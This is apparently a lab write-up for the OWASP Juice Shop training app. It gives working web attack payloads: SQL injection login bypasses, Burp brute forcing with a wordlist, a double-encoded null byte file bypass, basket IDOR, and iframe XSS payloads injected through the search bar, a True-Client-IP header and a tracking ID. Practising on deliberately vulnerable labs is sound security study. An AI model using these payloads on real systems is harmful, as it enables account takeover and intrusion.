Juice Shop

π Resources π
Enumeration
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
# Registered users
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
demo
0 st4rs f0r 7h3 h0rr1bl3 s3cur17y
K33p5 y0ur ju1cy 5plu773r 70 y0ur53lf!
y0ur f1r3wall needs m0r3 musc13
SQL Injection - Login
Admin - request:
{"email":"' or 1=1--","password":"aa"}
[email protected] - request:
{"email":"[email protected]'--","password":"a"}
Broken Authentication - Brute force
Login request to Intruder (Burp Suite) - brute force password with
/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt
{"email":"[email protected]","password":"admin123"}
FTP public at
/ftp
Find
[email protected]
passwordlisten - https://www.youtube.com/watch?v=v59CX2DiX0Y
[email protected]
Mr. N00dles
Poison Null Byte
URL Encoding and Null Bytes:
In URLs, the null byte (
\x00
) is encoded as%00
.Some web servers and applications improperly decode
%00
, interpreting it as a null byte, which can terminate strings prematurely.
Mismatch in Validation vs. Execution:
During validation, the application might check the entire string.
During execution, if the backend uses C-style string handling, the string stops at the null byte.
This mismatch can cause security checks to be bypassed.
%00
%2500
http://10.10.212.2/ftp/package.json.bak%2500.md
The %2500
encoding is an extra layer of obfuscation:
%25
is the literal encoding of%
, so%2500
decodes to%00
.This may be necessary when certain servers or filters block
%00
directly, but fail to handle double-encoded payloads like%2500
.
Go to http://10.10.212.2/main-es2015.js
F12 Dev Tools - Sources -
main-es2015.js
Search for
path: "administration"
go to http://10.10.212.2/#/administration
To view another user's shopping basket Go to http://10.10.212.2/#/basket
change to
GET /rest/basket/2
Go to http://machine_ip/#/administration
Remove 5 stars reviews
DOM XSS (Special)
Document Object Model-based Cross-site Scripting
Input the following in the search bar
XFS (Cross-Frame Scripting)
# e.g. 1
<iframe src="javascript:alert(`xss`)">
# e.g. 2
<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>
Persistent (Server-side)
With admin, go to http://10.10.212.2/#/privacy-security/last-login-ip
turn Burp interceptor on, and logout
for the
GET /rest/saveLoginIp
request, got to Headers tab and add a new header
Name:
True-Client-IP
Value:
<iframe src="javascript:alert(`xss`)">
Forward the request
Upon signing back into the admin account and revisiting the "Last Login IP" page, the XSS alert will trigger!
The True-Client-IP header functions similarly to the X-Forwarded-For header, as both inform the server or proxy about the client's IP address. However, due to the lack of proper sanitization in the header, we can exploit it to execute an XSS attack
Reflected (Client-side)
With admin, go to http://10.10.212.2/#/order-history
click truck icon -
http://10.10.212.2/#/track-result?id=5267-8f615dcb73f36818
Use the following iframe XSS in the place of the
5267-8f615dcb73f36818
<iframe src="javascript:alert(`xss`)">
Submit the URL, refresh the page, and an alert displaying "XSS" will appear!
The server uses a lookup table or database (depending on its configuration) to manage each tracking ID. Since the
id
parameter is not sanitized before being processed by the server, this allows us to execute an XSS attack
Solve other chalenges by checking http://10.10.212.2/#/score-board
Metrics challenge
http://10.10.212.2/metrics
Last updated
Was this helpful?